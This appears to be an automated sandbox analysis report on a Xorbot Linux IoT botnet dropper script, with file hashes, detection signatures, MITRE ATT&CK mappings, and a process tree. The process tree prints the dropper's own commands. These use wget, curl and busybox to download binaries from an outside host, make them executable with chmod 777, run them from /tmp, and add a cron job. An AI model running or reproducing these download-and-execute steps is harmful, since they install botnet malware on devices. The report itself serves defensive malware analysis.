xorbot | 960facbaa578092a17ffc41f54b65b77dff072120cc8c275d0a2ab44d97bbdad

Analysis

max time kernel
150s
max time network
153s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
10/12/2024, 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

8ad3c22d51b45d9d345d57cccc6e8e3c
SHA1

f6a7ded75ed90ad0b059c5d6231525d6ee7bfde9
SHA256

960facbaa578092a17ffc41f54b65b77dff072120cc8c275d0a2ab44d97bbdad
SHA512

ca38a5179c2793cf96a6d448d60126ee1b54de6ac717bed671d20bb6e7a83c11670f95260c2fede0f18014768d10615795cb25e4a05156c01352c57f35209923
SSDEEP

96:YrHMLddWpFplpWJdKDfcEI9j/91RJI8A5pBEL2mFLQMaLyKGU5RpaxapaYmuyQLi:/i3XWJdPzNimmZs3XWJdyP

Score

10^/10

xorbot antivm botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot
behavioral2/files/fstream-5.dat	family_xorbot
behavioral2/files/fstream-6.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2017) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
800	chmod
819	chmod
836	chmod
872	chmod
885	chmod
694	chmod
709	chmod
806	chmod
851	chmod
862	chmod

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr	696	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
/tmp/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH	837	SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
/tmp/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO	852	DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO

Renames itself 1 IoCs

pid	Process
697	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.by39Ul	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/972/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1064/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1067/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/723/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/726/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/773/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/926/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/19/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/831/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1060/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/843/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/900/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/952/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1023/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/29/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/704/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/771/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/782/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/829/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/935/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/991/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1072/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/761/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/765/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/786/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/815/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1082/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/998/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1053/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/27/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/876/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/894/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/957/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/903/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/960/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/11/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/41/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/759/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/825/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/920/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/353/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/706/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/884/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/902/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/848/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/934/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1040/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/283/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/725/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/750/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/787/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1019/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/819/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/823/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/904/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/962/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/735/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/871/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1047/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1000/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1038/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/1062/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/300/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
File opened for reading	/proc/756/cmdline	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr

System Network Configuration Discovery 1 TTPs 34 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
696	vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
706	wget
861	busybox
869	busybox
670	wget
676	curl
881	curl
892	wget
893	curl
712	wget
803	wget
817	busybox
875	wget
707	curl
732	curl
795	busybox
856	wget
804	curl
809	wget
827	curl
866	wget
844	curl
703	rm
708	busybox
805	busybox
815	curl
823	wget
829	busybox
841	wget
857	curl
868	curl
883	busybox
693	busybox
846	busybox

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr	curl
File opened for modification	/tmp/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH	busybox
File opened for modification	/tmp/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:661
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:668
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - System Network Configuration Discovery
  PID:670
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:676
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - System Network Configuration Discovery
  PID:693
- /bin/chmod
  chmod 777 vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  ./vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:696
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:698
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:699
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:700
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:701
- /bin/rm
  rm vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr
  2⤵
  - System Network Configuration Discovery
  PID:703
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  - System Network Configuration Discovery
  PID:706
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  - System Network Configuration Discovery
  PID:707
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  - System Network Configuration Discovery
  PID:708
- /bin/chmod
  chmod 777 EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  - File and Directory Permissions Modification
  PID:709
- /tmp/EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  ./EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  PID:710
- /bin/rm
  rm EzgQPDywUafwLiwesMZCU5Js3Z8FCFEZt6
  2⤵
  PID:711
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  - System Network Configuration Discovery
  PID:712
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  - System Network Configuration Discovery
  PID:732
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  - System Network Configuration Discovery
  PID:795
- /bin/chmod
  chmod 777 uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  ./uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  PID:801
- /bin/rm
  rm uLiJmf6rYbvTgixVUhUkO0zaGkSPM4gged
  2⤵
  PID:802
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  - System Network Configuration Discovery
  PID:803
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  - System Network Configuration Discovery
  PID:804
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  - System Network Configuration Discovery
  PID:805
- /bin/chmod
  chmod 777 vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  ./vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  PID:807
- /bin/rm
  rm vUrPno7OnuPYhVMK2KPak1bV63IVRNB05Y
  2⤵
  PID:808
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  - System Network Configuration Discovery
  PID:809
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  - System Network Configuration Discovery
  PID:815
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  - System Network Configuration Discovery
  PID:817
- /bin/chmod
  chmod 777 umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/umSdWceArbP8EqudOFLf6SReg6aTilonVT
  ./umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  PID:821
- /bin/rm
  rm umSdWceArbP8EqudOFLf6SReg6aTilonVT
  2⤵
  PID:822
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  - System Network Configuration Discovery
  PID:823
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  - System Network Configuration Discovery
  PID:827
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:829
- /bin/chmod
  chmod 777 SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  ./SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH
  2⤵
  PID:840
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  - System Network Configuration Discovery
  PID:841
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  - System Network Configuration Discovery
  PID:844
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:846
- /bin/chmod
  chmod 777 DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  ./DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  - Executes dropped EXE
  PID:852
- /bin/rm
  rm DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO
  2⤵
  PID:854
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  - System Network Configuration Discovery
  PID:856
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  - System Network Configuration Discovery
  PID:857
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  - System Network Configuration Discovery
  PID:861
- /bin/chmod
  chmod 777 wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  ./wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  PID:863
- /bin/rm
  rm wwxIYkCWmsxzPwSI0xyCp8d8Cnl9Dl21MY
  2⤵
  PID:865
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  - System Network Configuration Discovery
  PID:866
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  - System Network Configuration Discovery
  PID:868
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  - System Network Configuration Discovery
  PID:869
- /bin/chmod
  chmod 777 tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  ./tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  PID:873
- /bin/rm
  rm tgvkDqjIqJ9yWX282gDrUPOBxwNL8Dv079
  2⤵
  PID:874
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  - System Network Configuration Discovery
  PID:875
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  - System Network Configuration Discovery
  PID:881
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  - System Network Configuration Discovery
  PID:883
- /bin/chmod
  chmod 777 9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  ./9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  PID:889
- /bin/rm
  rm 9MwoSzOGLJsRUhoGpD9rrRJCeWtLf5H3KE
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mg9j8gqnnIqnaNiUDO56Goxak91x7SF2PU
  2⤵
  - System Network Configuration Discovery
  PID:892
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mg9j8gqnnIqnaNiUDO56Goxak91x7SF2PU
  2⤵
  - System Network Configuration Discovery
  PID:893

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/DnUaWcPR6S0RX3oHIOfhQZrHk0DvuX9xDO

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/SCxS9e3AmZXk4jLw0ckYy7zUsDpF2Gk7jH

Filesize
122KB

MD5
cd3d4b9c643e5b473fb4d88ed05f0716

SHA1
64ee7a97418583d759eaea8000890cc3bae1b5f4

SHA256
0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

SHA512
164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

Download Submit
/tmp/vBGeXXC3lZY2G50ip7PzvmrfQ5UNoS1Lpr

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.by39Ul

Filesize
210B

MD5
1925665d5ec630337b43489943d8af7b

SHA1
24a55a8ac3d2d70ab4e54015a56d9f7c7b827763

SHA256
c8bec743a2591917c37d994d04c29a65c099c9d61bd861b1e72d4cade4e8fe49

SHA512
f6d3f0f8cfe0ad553ea299a3a610fa06b3f51f68aee75ab643082d571110a4a7b8b3e82208ef44535ddc990b15d9c1e64e7ef3ce37fb9d248bf8591adc92bc08

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads